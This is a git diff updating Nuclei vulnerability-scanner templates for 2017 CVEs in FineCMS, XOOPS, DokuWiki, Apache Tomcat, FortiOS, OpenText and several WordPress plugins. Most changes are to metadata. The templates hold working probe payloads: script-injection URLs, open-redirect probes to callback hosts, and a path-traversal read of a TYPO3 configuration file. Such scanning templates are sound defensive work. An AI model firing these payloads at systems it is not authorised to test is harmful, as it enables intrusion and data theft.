vulnerability. reference: - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-11629 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40119 + cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: finecms + product: finecms tags: cve,cve2017,xss,finecms -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php" @@ -39,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/31 +# digest: 4b0a00483046022100d01d92bbe3a4ba9ea85de6f3a033ae4aa2b93a18bd1629682789b01668ec35140221008619ec2e6de780f1c714003d002cb9e11f38bbb4b01264975b377553dface393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-12138.yaml b/nuclei-templates/CVE-2017/CVE-2017-12138.yaml index f1dcb57708..98472b843b 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-12138.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-12138.yaml @@ -3,26 +3,47 @@ id: CVE-2017-12138 info: name: XOOPS Core 2.5.8 - Open Redirect author: 0x_Akoko - severity: low - description: XOOPS Core 2.5.8 has a stored URL redirect bypass vulnerability in /modules/profile/index.php because of the URL filter. + severity: medium + description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Apply the latest security patch or upgrade to a newer version of XOOPS Core to fix the open redirect vulnerability. reference: - https://github.com/XOOPS/XoopsCore25/issues/523 - - https://www.cvedetails.com/cve/CVE-2017-12138 - tags: cve,cve2017,redirect,xoops + - https://xoops.org + - https://nvd.nist.gov/vuln/detail/CVE-2017-12138 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-12138 cwe-id: CWE-601 + epss-score: 0.00062 + epss-percentile: 0.24419 + cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: xoops + product: xoops + tags: cve,cve2017,redirect,xoops,authenticated -requests: - - method: GET +http: + - raw: + - | + POST /user.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - path: - - '{{BaseURL}}/xoops/modules/profile/index.php?op=main&xoops_redirect=https://www.example.com' + uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login + - | + GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1 + Host: {{Hostname}} matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a0047304502210086fe37ec367180de3965e272e7b960209ab80611b4c55bcd92d3b1cfda6074100220136441eb75bb6eeecb92bf19aa6776daade6154861d0ce3e94bbabdd66679817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-12149.yaml b/nuclei-templates/CVE-2017/CVE-2017-12149.yaml old mode 100755 new mode 100644 diff --git a/nuclei-templates/CVE-2017/CVE-2017-12583.yaml b/nuclei-templates/CVE-2017/CVE-2017-12583.yaml index 232be74216..4ee30b5e16 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-12583.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-12583.yaml @@ -1,21 +1,34 @@ id: CVE-2017-12583 info: - name: Reflected XSS in doku.php + name: DokuWiki - Cross-Site Scripting author: DhiyaneshDK severity: medium - metadata: - shodan-query: 'http.title:"DokuWiki"' - description: "DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php." - reference: https://github.com/splitbrain/dokuwiki/issues/2061 + description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability. + reference: + - https://github.com/splitbrain/dokuwiki/issues/2061 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12583 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-12583 cwe-id: CWE-79 + epss-score: 0.00117 + epss-percentile: 0.44712 + cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dokuwiki + product: dokuwiki + shodan-query: http.title:"DokuWiki" tags: cve,cve2017,xss,dokuwiki -requests: +http: - method: GET path: - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=' @@ -35,3 +48,4 @@ requests: - type: status status: - 200 +# digest: 490a00463044022040428c7102aee34ec9392abb1a5987369b001372f29a97e6592a24621b4deee302206d6c2d35e3f7dcf178bac29764bc37dc1b7b92218a5ca66ca4c21d133e32a5a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-12611.yaml b/nuclei-templates/CVE-2017/CVE-2017-12611.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12611.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12611.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-12617.yaml b/nuclei-templates/CVE-2017/CVE-2017-12617.yaml index 66def8bc94..ff6836350e 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-12617.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-12617.yaml @@ -1,4 +1,4 @@ -id: "CVE-2017-12617" +id: CVE-2017-12617 info: name: Apache Tomcat - Remote Code Execution @@ -6,6 +6,8 @@ info: severity: high description: | When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server. remediation: | Upgrade to Apache Tomcat version 7.0.80 or later to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 8.1 cve-id: "CVE-2017-12617" cwe-id: CWE-434 - epss-score: 0.9747 - epss-percentile: 0.99958 + epss-score: 0.97533 + epss-percentile: 0.99992 cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* metadata: verified: "true" @@ -28,7 +30,7 @@ info: vendor: apache product: tomcat shodan-query: html:"Apache Tomcat" - tags: cve,cve2017,tomcat,apache,rce,kev,intrusive + tags: cve2017,cve,tomcat,apache,rce,kev,intrusive http: - raw: @@ -51,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210081dd15a574ca1994acb413595d6dc1c949337710a23b15994c76be8a30ad21fe02200ee6bd71c2ae1e2652e65a43d43cbd1ec2bef89a1637ddc3604e1d71b58c76b9:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206cb00e6b5ee9e566dec0f1232554eaeda4e733f1c1dd46e3373f782288e400b0022062b74144462bbf9d3db2d69023b0aeacde9792aed39f01c1f567d838f5ff8a8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-12794.yaml b/nuclei-templates/CVE-2017/CVE-2017-12794.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12794.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12794.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-14135.yaml b/nuclei-templates/CVE-2017/CVE-2017-14135.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-14135.yaml rename to nuclei-templates/CVE-2017/CVE-2017-14135.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-14186.yaml b/nuclei-templates/CVE-2017/CVE-2017-14186.yaml index dfd8631bb8..e70352dcf8 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-14186.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-14186.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement. + remediation: | + Apply the latest security patches or firmware updates provided by Fortinet to mitigate this vulnerability. reference: - https://www.fortiguard.com/psirt/FG-IR-17-242 - https://fortiguard.com/advisory/FG-IR-17-242 - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891 - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 + - http://www.securitytracker.com/id/1039891 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-14186 cwe-id: CWE-79 + epss-score: 0.02948 + epss-percentile: 0.89847 + cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: fortinet + product: fortios shodan-query: port:10443 http.favicon.hash:945408572 - verified: "true" - tags: cve,cve2017,fortigate,xss,fortinet -requests: + tags: cve2017,cve,fortigate,xss,fortinet + +http: - method: GET path: - "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)" @@ -40,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/11 +# digest: 4a0a0047304502207fbfece700e8438f7ceb29e6cb4c1c3db50af2a9118f2a83bd83f1038f9e82d6022100a1093d8d2a97f1f72a728b30504eb3343bb6c5154e62389cc9ab4c4b6c8d3bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-14524.yaml b/nuclei-templates/CVE-2017/CVE-2017-14524.yaml index be7c67f156..e87149510b 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-14524.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-14524.yaml @@ -1,40 +1,25 @@ id: CVE-2017-14524 - info: - name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect + name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect author: 0x_Akoko - severity: medium - description: | - OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. + severity: low + description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 - - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 - - http://seclists.org/fulldisclosure/2017/Sep/57 + - https://www.cvedetails.com/cve/CVE-2017-14524 + - https://vuldb.com/?id.107201 + tags: cve,cve2017,redirect,opentext classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 cve-id: CVE-2017-14524 cwe-id: CWE-601 - epss-score: 0.00258 - epss-percentile: 0.63405 - cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: opentext - product: documentum_administrator - tags: cve,cve2017,redirect,opentext,seclists - -http: +requests: - method: GET path: - - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' - + - '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' matchers: - type: regex - part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# digest: 4a0a00473045022067c66ad6a35140adea527b46677371897d097f59fd7bc558671a8532fbb99f4e022100f1adf441d12b7d3fbfbd021a1de838d34432ef3d8740bbd1f69fec1252a7ca12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/nuclei-templates/CVE-2017/CVE-2017-14622.yaml b/nuclei-templates/CVE-2017/CVE-2017-14622.yaml index 2340ac5799..14d594b33d 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-14622.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-14622.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update the WordPress 2kb Amazon Affiliates Store plugin to version 2.1.1 or later to mitigate the vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622 - https://nvd.nist.gov/vuln/detail/CVE-2017-14622 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48561 + epss-percentile: 0.47816 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +30,7 @@ info: vendor: 2kblater product: 2kb_amazon_affiliates_store framework: wordpress - tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm + tags: cve2017,cve,xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater http: - raw: @@ -50,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# digest: 490a00463044022028958230f8a40abbd7c8489fd5149c05865443e53a572c02f6ec22738c0cda860220348fa263e025a0d9fbc89c8bcdc498b79f9b7cf247e6f596c9bdd82386bb58e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df3637896184e2aa1264d2f8525ee71b55512c568590dccf0a39b3fac376f08002210095e59997264b698ff5ffe471f30c28dd486358c7dcbf06fb0bf4b2265c129718:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-15287.yaml b/nuclei-templates/CVE-2017/CVE-2017-15287.yaml index 1d02d679db..144181dec3 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-15287.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-15287.yaml @@ -1,4 +1,5 @@ id: CVE-2017-15287 + info: name: Dreambox WebControl 2.0.0 - Cross-Site Scripting author: pikpikcu @@ -15,12 +16,14 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 tags: cve,cve2017,xss,dreambox + requests: - raw: - | GET /webadmin/pkg?command= HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded + matchers: - type: word words: diff --git a/nuclei-templates/CVE-2017/CVE-2017-15363.yaml b/nuclei-templates/CVE-2017/CVE-2017-15363.yaml index 45ee25fecd..aafe16b2b5 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-15363.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-15363.yaml @@ -13,21 +13,24 @@ info: cve-id: CVE-2017-15363 cwe-id: CWE-98 tags: cve,cve2017,restler,lfi + requests: - method: GET path: - "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php" + matchers-condition: and matchers: - type: word - words: - - "database" - - "host" - - "password" - - "port" - - "username" part: body + words: + - "\">All" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Google AdSense")' + condition: and +# digest: 4a0a00473045022100ac224191317b7f9d5c8305933b2f932fc9c11bbb1d356f807a34412326386f6002201ffc830ad1f53205651cbf36c8e55b45f44beea9ded57833044904fb6736187e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18490.yaml b/nuclei-templates/CVE-2017/CVE-2017-18490.yaml index f1db2cb3e5..bcbe1eff61 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18490.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18490.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18490 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: contact_form_multi framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-multi/" - tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi + tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 4a0a0047304502210088adfd2411310401e44b49da3084320b78d6f55e0981c43ee738636156a26a990220272bb45208daa279af3ff70f1414b38e91b28691032cf045cb88c95d09a29d42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047a86d472b4963557d6bdde6b11f2b646e6313f13a90a273e1fce430e894092102205e15a23b0220c1cbb8df6bccb36fd1346acd96b67121cd1349c4c4016415f034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18491.yaml b/nuclei-templates/CVE-2017/CVE-2017-18491.yaml index 41afaa4ccc..73517d0595 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18491.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18491 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: contact_form framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-plugin/" - tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form by")' condition: and -# digest: 490a004630440220203aafce6366113241d95488aea53216df347aac7feb8a2dd590fae6e3ff1c500220048e995f1d8d71aba72d1417c1bac63fe901566d78c3781b06aaf4cf4908fa8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022aaa77f0654980937b928d490f572e59c3e40755b874d4e7ff6a7168136202b02203fcd59db42dff8780151fd38459c2b921a77502f91ff4c72364ad218117af4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18492.yaml b/nuclei-templates/CVE-2017/CVE-2017-18492.yaml index 14dcc4ecb5..c7fa05e53a 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18492.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18492.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18492 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: contact_form_to_db framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-to-db/" - tags: cve,cve2017,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated + tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 4b0a00483046022100a70ae9b55be5f675d9dffff25aacca6f0df2f52469be2504c28033d4dbae1e33022100affe9b3e411d408f8602bb356fbd2e1394ce29302d62814b1a34098115af0764:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009117b9d4328ea3a5d94d9ecd68c3c1402e95a82c3b7f5946adaf2c0210a7dd9302203ec8c8a43e1798ce9f668234b12d6d47f7b08c68abd2f858016c8b168794db62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18493.yaml b/nuclei-templates/CVE-2017/CVE-2017-18493.yaml index 4d7901b921..0d6b511623 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18493.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18493.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18493 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: custom_admin_page framework: wordpress publicwww-query: "/wp-content/plugins/custom-admin-page/" - tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 4a0a0047304502205647930cba85d71e9016c68c7d53f0ea979fce8262c06573af3db4d5e3507940022100ed89e326160e41f336646e6ce61c6ea1bae98337053401aa36db0e304310cfd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8f985f73aa53f158d7b69dc00405ae8393492e82583cda9393d45d6e09b86df022100f47e60f2df1bbdfee0a7a9497bda25b96739c2c69f49f2d8b587082bc45df3b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18494.yaml b/nuclei-templates/CVE-2017/CVE-2017-18494.yaml index 746248f338..f35075d372 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18494.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18494.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18494 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36857 cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: custom_search framework: wordpress publicwww-query: "/wp-content/plugins/custom-search-plugin/" - tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Search by")' condition: and -# digest: 4a0a004730450220521a1b85bd59b69bd22d77d449825ac58c78a76d8200ab871c093577ee59d97a022100be896fea94f678b0ceeff6660d8170ffc70d8f779cf92d3eb91d13c6e97b0110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f9cc3cc8539a1d411d5a0fc2255808c1742059f86723ee77d65a025201fb801e022100d596c70a28642269afc2cafe1fecf0ff789694b8d7407ac813fd2a6adb176d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18496.yaml b/nuclei-templates/CVE-2017/CVE-2017-18496.yaml index 461e3f4358..9cd3d64dfa 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18496.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18496 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: htaccess framework: wordpress publicwww-query: "/wp-content/plugins/htaccess/" - tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Htaccess by")' condition: and -# digest: 4a0a00473045022100d6b357df450ea3ce8267e7d5858292ab2f859867e919bb3f1c9f0f7336d14762022049d5be02e863606e96828d81586d1f1e7027d8c6696d83acaecfc7dea8f04eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083bbc08d8af961271e098a1736c206c3ef81fc9a67b9886fc1185988a4a8d5310221008313ab9d0915cea1add617dcb62ca6f423209ab3d00216d25b0440fe803c5b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18500.yaml b/nuclei-templates/CVE-2017/CVE-2017-18500.yaml index 3066821d40..d1554790f4 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18500.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18500.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18500 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61153 + epss-percentile: 0.60522 cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: social_buttons_pack framework: wordpress publicwww-query: "/wp-content/plugins/social-buttons-pack/" - tags: cve,cve2017,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated + tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 490a0046304402206fad8425d684cf73a566a7ae1849039963806c20b79e7a1272664ec2e814228b022040814da01be4f898a4d8e5dc8fe265627cc24a7536218014506ab61b8fb084fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f89fb19d15fb08118427dcbbec861334e2869b19a7f7629f950880a2b1a030a402204c072011a5c2993febfb3b7ebae8ee5904fd3f1ab56497f1dbfcdc2b0383083d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18501.yaml b/nuclei-templates/CVE-2017/CVE-2017-18501.yaml index 67744d31b6..7f84a097f0 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18501.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18501.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18501 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61153 + epss-percentile: 0.60522 cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,8 +25,8 @@ info: vendor: 